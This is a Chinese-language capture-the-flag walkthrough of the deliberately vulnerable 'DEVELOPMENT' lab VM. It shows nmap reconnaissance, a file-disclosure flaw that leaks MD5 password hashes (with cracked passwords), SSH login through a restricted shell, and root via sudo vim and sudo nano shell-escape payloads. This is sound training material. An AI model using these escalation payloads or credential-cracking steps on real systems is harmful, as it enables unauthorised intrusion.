红队打靶练习:DIGITALWORLD.LOCAL: DEVELOPMENT

信息收集

1、arp

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.141  00:50:56:2f:2e:b2       VMware, Inc.
192.168.12.254  00:50:56:f2:fe:52       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.353 seconds (108.80 hosts/sec). 4 responded

2、netdiscover

netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 63 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 3780
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08     48    2880  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      9     540  VMware, Inc.
 192.168.12.141  00:50:56:2f:2e:b2      5     300  VMware, Inc.
 192.168.12.254  00:50:56:f2:fe:52      1      60  VMware, Inc.

3、nmap

主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 14:59 CST
Nmap scan report for 192.168.12.1
Host is up (0.00027s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000051s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.141
Host is up (0.00012s latency).
MAC Address: 00:50:56:2F:2E:B2 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.000053s latency).
MAC Address: 00:50:56:F2:FE:52 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.38 seconds

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.141 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:02 CST
Nmap scan report for 192.168.12.141
Host is up (0.0026s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
113/tcp  open  ident
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy
MAC Address: 00:50:56:2F:2E:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | awk -F "/" '{print $1}' | head -n 10 | tail -n 5 | xargs -n 6 | sed 's/ /,/g'
22,113,139,445,8080

信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,113,139,445,8080 192.168.12.141 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:03 CST
Nmap scan report for 192.168.12.141
Host is up (0.00043s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|   256 c2:b6:8c:36:a6:dd:9b:17:bb:4f:0e:0f:16:89:d6:4b (ECDSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
|     ETag: "230-57de32091ad69"
|     Accept-Ranges: bytes
|     Content-Length: 560
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <html>
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
|     </head>
|     <body>
|     <p>Welcome to the Development Page.</p>
|     <br/>
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>
|     <br/>
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
|     <br/>
|     <br/>
|     <br/>
|     <hr>
|     <i>Powered by IIS 6.0</i>
|     </body>
|     <!-- Searching for development secret page... where could it be? -->
|     <!-- Patrick, Head of Development-->
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Allow: HEAD,GET,POST,OPTIONS
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Date: Thu, 21 Dec 2023 07:03:52 GMT
|     Server: IIS 6.0
|     Content-Length: 293
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>IIS 6.0 Server at 192.168.12.141 Port 8080</address>
|_    </body></html>
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
|_http-server-header: IIS 6.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=12/21%Time=6583E358%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2021\x20Dec\
SF:x202023\x2007:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\
SF:x20Wed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de3
SF:2091ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary
SF::\x20Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/h
SF:tml\r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR
SF:\x20OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welc
SF:ome\x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20a
SF:re\x20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20
SF:these\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20
SF:We\x20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection
SF:\x20system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@go
SF:odtech\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\
SF:x20by\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20
SF:development\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20
SF:-->\r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</ht
SF:ml>\r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x20
SF:21\x20Dec\x202023\x2007:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow
SF::\x20HEAD,GET,POST,OPTIONS\r\nContent-Length:\x200\r\nConnection:\x20cl
SF:ose\r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CC,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nDate:\x20Thu,\x2021\x20Dec\x202023\x2007:
SF:03:52\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20293\r\nCon
SF:nection:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\
SF:r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//E
SF:N\">\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>
SF:\n<h1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x
SF:20that\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>
SF:\n<hr>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.12\.141\x20Po
SF:rt\x208080</address>\n</body></html>\n");
MAC Address: 00:50:56:2F:2E:B2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: development
|   NetBIOS computer name: DEVELOPMENT\x00
|   Domain name: \x00
|   FQDN: development
|_  System time: 2023-12-21T07:05:23+00:00
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2023-12-21T07:05:23
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: -4s, deviation: 3s, median: -6s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.12.141

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.48 seconds

漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,113,139,445,8080 192.168.12.141 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-21 15:09 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.141
Host is up (0.00017s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
113/tcp  open   ident
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
8080/tcp open   http-proxy
MAC Address: 00:50:56:2F:2E:B2 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: TIMEOUT
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 197.55 seconds

4、端口总结

22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)  后续可以用的上。

113/tcp  open  ident?     端口113/tcp是一个开放的ident端口。Ident（Identification Protocol）是一种用于验证连接的客户端的身份的协议。它通常用于识别和验证通过Internet连接到服务器的用户。

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)   端口139/tcp是一个开放的netbios-ssn端口，同时运行着Samba的smbd服务版本3.x到4.x，所属工作组为WORKGROUP。

445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)  端口445/tcp是一个开放的netbios-ssn端口，同时运行着Samba的smbd服务版本4.7.6，所属工作组仍然是WORKGROUP

8080/tcp open  http-proxy  IIS 6.0  IIS 是微软的Web服务器软件，用于托管网站和应用程序。端口8080通常是用作代理服务器，用于转发客户端发起的HTTP请求。

WEB

8080端口

翻译

欢迎访问开发页面。
这个盒子里有很多项目。在html_pages上查看其中一些项目。
警告！我们正在试验一种基于主机的入侵检测系统。向报告所有误报patrick@goodtech.com.sg.

8080端口主页源码

<!-- Searching for development secret page... where could it be? -->

<!-- Patrick, Head of Development-->

根据提示 development  这个单词出现的频率很高。
也提示我们去 html_pages 页面寻找信息。

靶机提示说不建议使用暴力破解，我进行目录探测的时候，可能是因为线程太高，靶机直接不让我扫描了！而且靶机介绍信息也说了该主页不太稳定。

/development页面

要我们下载一个名为   test.pcap的流量包！ 

这个流量包其实就是个捷径！我这里没有列出，在流量包中设置过滤器为http，回显为200的流量包中可以找到一个路径！（/developmentsecretpage/sitemap.php）

/html_pages 页面

/development.html页面

访问 ./developmentsecretpage 

sitemap.php

来到 /developmentsecretpage/sitemap.php页面，点击注销。

漏洞探测

文件泄露

直接使用谷歌搜索，就会出现该漏洞的payload

这个页面存在信息泄露以及文件包含漏洞！

我得到了账号密码：

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 4a8a2b374f463b7aedbb44a066363b81
patrick, 87e6d56ce79af90dbe07d387d3d0579e
qiu, ee64497098d0926d198f54f6d5431f98

MD5爆破

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb      
intern, 4a8a2b374f463b7aedbb44a066363b81   （12345678900987654321） 
patrick, 87e6d56ce79af90dbe07d387d3d0579e  （P@ssw0rd25）
qiu, ee64497098d0926d198f54f6d5431f98      （qiu）

ssh登录

┌──(root㉿ru)-[~/kali]
└─# ssh intern@192.168.12.141
intern@192.168.12.141's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-213-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 21 09:01:17 UTC 2023

  System load:  0.05               Processes:            171
  Usage of /:   31.5% of 19.51GB   Users logged in:      0
  Memory usage: 31%                IP address for ens33: 192.168.12.141
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

186 packages can be updated.
56 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Thu Dec 21 08:59:21 2023 from 192.168.12.128
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$ ls
access  local.txt  work.txt
intern:~$

提权

系统信息收集

Last login: Thu Dec 21 09:03:54 2023 from 192.168.12.128
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
intern:~$

好家伙，只能使用这些命令。用别的话会退出。

intern:~$ id
Traceback (most recent call last):
  File "/usr/local/bin/lshell", line 27, in <module>
    lshell.main()
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 1165, in main
    cli.cmdloop()
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 385, in cmdloop
    stop = self.onecmd(line)
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 503, in onecmd
    func = getattr(self, 'do_' + cmd)
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 134, in __getattr__
    if self.check_path(self.g_line) == 1:
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 303, in check_path
    item = re.sub('^~', self.conf['home_path'], item)
  File "/usr/lib/python2.7/re.py", line 155, in sub
    return _compile(pattern, flags).sub(repl, string, count)
TypeError: expected string or buffer
Connection to 192.168.12.141 closed.


┌──(root㉿ru)-[~/kali]
└─#

intern@development:~$ ls
access  local.txt  work.txt
intern@development:~$ cat local.txt
Congratulations on obtaining a user shell. :)
intern@development:~$ cat work.txt
1.      Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.

2.      Patrick's start of the third year in this company!

3.      Attend the meeting to discuss if password policy should be relooked at.
intern@development:~$

祝贺您获得用户权限。：）

1.告诉帕特里克，喊话不管用。我们需要恢复到旧的方法来更新David关于shoutbox的信息。对于新的，我们将使用旧导演的登录页。
2.帕特里克在这家公司的第三年开始了！
3.参加会议讨论是否应重新查看密码策略。

intern@development:~$ cat /etc/passwd | grep "/home" | grep -v "nologin"
admin:x:1000:1004:DEVELOPMENT:/home/admin:/bin/bash
patrick:x:1001:1005:,,,:/home/patrick:/bin/bash
intern:x:1002:1006::/home/intern:/usr/local/bin/lshell

intern@development:/home$ cd intern/
intern@development:~$ ls -al
total 36
drwxr-xr-x 6 intern intern 4096 Dec 21 09:07 .
drwxr-xr-x 5 root   root   4096 Jun 14  2018 ..
drwxrwxrwx 9 intern intern 4096 Jul 16  2018 access
drwx------ 2 intern intern 4096 Jul 16  2018 .cache
drwx------ 3 intern intern 4096 Jul 16  2018 .gnupg
-rw------- 1 intern intern   56 Dec 21 09:07 .lhistory
drwxrwxr-x 3 intern intern 4096 Jul 15  2018 .local
-rw-r--r-- 1 intern intern   46 Dec 26  2018 local.txt
-rw-r--r-- 1 intern intern  299 Dec 26  2018 work.txt
intern@development:~$ cd access/
intern@development:~/access$ ls
IA64  tcpdump.txt  W32ALPHA  W32MIPS  W32PPC  W32X86  WIN40  x64
intern@development:~/access$ cat tcpdump.txt
1. request for rights to perform tcpdump on traffic. we want to monitor network traffic.
2. tcpdump is a useful tool; we should learn how to pipe tcpdump traffic for building up our Security Operations Centre.
intern@development:~/access$

1.请求对流量执行tcpdump的权限。我们想要监控网络流量。
2.tcpdump是一个有用的工具；我们应该学习如何通过管道传输tcpdump流量来建立我们的安全操作中心。

intern@development:/home/patrick$ ls -al
total 40
drwxr-xr-x 4 patrick patrick 4096 Sep 29  2018 .
drwxr-xr-x 5 root    root    4096 Jun 14  2018 ..
-rw-r--r-- 1 patrick patrick  168 Jul 23  2018 access.txt
-rw-r--r-- 1 patrick patrick  220 Jun 12  2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3771 Jun 12  2018 .bashrc
drwx------ 2 patrick patrick 4096 Jun 12  2018 .cache
drwx------ 3 patrick patrick 4096 Jun 12  2018 .gnupg
-rw-r--r-- 1 patrick patrick  425 Jul 23  2018 password.txt
-rw-r--r-- 1 patrick patrick  807 Jun 12  2018 .profile
-rw-r--r-- 1 patrick patrick    0 Jun 12  2018 .sudo_as_admin_successful
-rw------- 1 patrick patrick 1077 Aug 27  2018 .viminfo
intern@development:/home/patrick$ cat access.txt
/-\/-\----/-\/-\
\-/\-/\--/\-/\-/

  ACCESS PANEL

/-\/-\/--\/-\/-\
\-/\-/----\-/\-/

LOGIN: _________
PASSWORD: ______

SORRY.
ACCESS DENIED.

YOU MUST...
TRY HARDER.
intern@development:/home/patrick$ cat password.txt
(----------------------)
 (--------------------)
  (------------------)
   (----------------)
    (--------------)

     WELCOME TO THE
        PASSWORD
         PORTAL

        INTRUDER
         ALERT!

    (---------------)
   (-----------------)
  (-------------------)
 (---------------------)
(-----------------------)

 TO ROOT ME, YOU NEED TO

(-----------------------)

      TRY HARDER!!!

(-----------------------)

密码就是之前我们找到的  patrick, 87e6d56ce79af90dbe07d387d3d0579e  （P@ssw0rd25）

本地提权

intern@development:/home/patrick$ su patrick
Password:
patrick@development:~$ id
uid=1001(patrick) gid=1005(patrick) groups=1005(patrick),108(lxd)
patrick@development:~$

patrick@development:~$ sudo -l
Matching Defaults entries for patrick on development:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User patrick may run the following commands on development:
    (ALL) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /bin/nano
patrick@development:~$

vim提权


patrick@development:~$ sudo vim -c ':!/bin/sh'

# id
uid=0(root) gid=0(root) groups=0(root)
#


payload

1、sudo vim -c ':!/bin/sh'

2、sudo vim  --> :!/bin/bash

nano提权

Command to execute: reset; sh 1>&0 2>&0#
#  Get Help                        ^X Read File
#  Cancel                          M-F New Buffer
#
#
# id
uid=0(root) gid=0(root) groups=0(root)


payload

sudo nano
^R^X   = ctrl + r 、ctrl + x
reset; sh 1>&0 2>&0

get root and flag

# id
uid=0(root) gid=0(root) groups=0(root)

# whereis python
python: /usr/bin/python /usr/bin/python2.7 /usr/bin/python3.6 /usr/bin/python3.6m /usr/lib/python3.7 /usr/lib/python2.7 /usr/lib/python3.6 /etc/python /etc/python2.7 /etc/python3.6 /usr/local/lib/python2.7 /usr/local/lib/python3.6 /usr/share/python /usr/share/man/man1/python.1.gz

# python2 -c 'import pty;pty.spawn("/bin/bash")'

root@development:/root# ls -al
total 72
drwx------  5 root  root    4096 Dec 26  2018 .
drwxr-xr-x 23 root  root    4096 Dec 21 08:27 ..
-rw-------  1 root  root    1622 Dec 26  2018 .bash_history
-rw-r--r--  1 root  root    3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root  root     644 Jun 14  2018 iptables-rules
drwxr-xr-x  3 root  root    4096 Jun 12  2018 .local
drwxr-xr-x  7 admin lpadmin 4096 Aug 23  2018 lshell-0.9.9
-rw-r--r--  1 root  root     148 Aug 17  2015 .profile
----------  1 root  root      43 Dec 26  2018 proof.txt
-rw-------  1 root  root    1024 Aug  1  2018 .rnd
-rw-r--r--  1 root  root      66 Sep 26  2018 .selected_editor
-rw-r--r--  1 root  root    9542 Jul 15  2018 smb.conf
drwx------  2 root  root    4096 Jun 10  2018 .ssh
-rwx------  1 root  root     229 Sep 26  2018 tcpdumpclock.sh
-rw-------  1 root  root     582 Aug 27  2018 .viminfo
-rw-r--r--  1 root  root     209 Aug  1  2018 .wget-hsts

root@development:/root# cat proof.txt
Congratulations on rooting DEVELOPMENT! :)

root@development:/root#